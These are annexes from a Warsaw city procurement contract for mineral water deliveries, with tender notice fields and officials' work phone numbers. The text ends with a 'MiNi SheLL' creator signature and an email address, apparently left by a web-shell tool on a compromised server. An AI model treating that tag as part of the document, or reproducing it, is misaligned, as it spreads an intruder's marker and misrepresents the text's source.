Pl. Bankowy 3/5, 00-950 Warszawa
NIP 525-22-48-481


4. Komórka organizacyjna Urzędu m. st. Warszawy właściwa do zamawiania i potwierdzania realizacji dostaw wody w zakresie objętym niniejszym załącznikiem:
     - Gabinet Prezydenta Urzędu m.st. Warszawy
     - osoba odpowiedzialna: ________________________

5. Wynagrodzenie w zakresie objętym niniejszym załącznikiem w wysokości nie przekraczającej kwoty łącznej: 
- ogółem kwota brutto _________ zł (słownie: ______________złotych 00/100) 


Wykonawca                                                                       Dyrektor
                                                                                                                                                                                           Gabinetu Prezydenta
									                                                            Urzędu m. st. Warszawy 
									











Załącznik Nr 4 do Umowy nr AG/B/X/2/1/____________
dla Centrum Komunikacji Społecznej  Urzędu m.st. Warszawy




1. Zakres przedmiotu umowy dla Gabinetu Prezydenta Urzędu m.st. Warszawy:
   

L.p.	Nazwa asortymentu	Jednostka miary	Ilość szacunkowa
1	Woda mineralna niegazowana	1,5 litra	1100 
2	Woda mineralna gazowana	             1,5 litra	1100 
3	Woda mineralna niegazowana	0,7 litra	13200


2. Wielkość, miejsce i czas dostarczenia każdej partii wody mineralnej będzie wynikać   z jednostronnej dyspozycji osób odpowiedzialnych za realizację przedmiotu umowy po stronie Zamawiającego, przesłanej Wykonawcy faksem lub e-mailem.


3. Płatnik/ Odbiorca:                    Miasto Stołeczne Warszawa,
Pl. Bankowy 3/5, 00-950 Warszawa
NIP 525-22-48-481


4. Komórka organizacyjna Urzędu m. st. Warszawy właściwa do zamawiania i potwierdzania realizacji dostaw wody w zakresie objętym niniejszym załącznikiem:
     - Centrum Komunikacji Społecznej Urzędu m.st. Warszawy
     - osoba odpowiedzialna_________________

5. Wynagrodzenie w zakresie objętym niniejszym załącznikiem w wysokości nie przekraczającej kwoty łącznej: 
- ogółem kwota brutto __________ zł (słownie: _________________-złotych 00/100) 




         Wykonawca                                                                Dyrektor
                                                                Centrum Komunikacji Społecznej 
					         Urzędu m. st. Warszawy</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osoby uprawnione do porozumiewania się z Wykonawcami 1) w zakresie dotyczącym przedmiotu zamówienia: imię nazwisko: Piotr wachnowicz, stanowisko służbowe: Naczelnik w Biurze Administracyjno-Gospodarczym, tel.: (22) 443 30 10, 2) w zakresie dotyczącym zagadnień formalno - prawnych: imię nazwisko: Agata Nowak, stanowisko służbowe: Inspektor w Biurze Zamówień Publicznych, tel.: 22/ 443 14 16, 3) w zakresie dotyczącym procedury licytacji elektronicznej: imię nazwisko: Ryszard Jóźwik, stanowisko służbowe: Podinspektor w Biurze Zamówień Publicznych tel.: 22/ 443 14 09.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com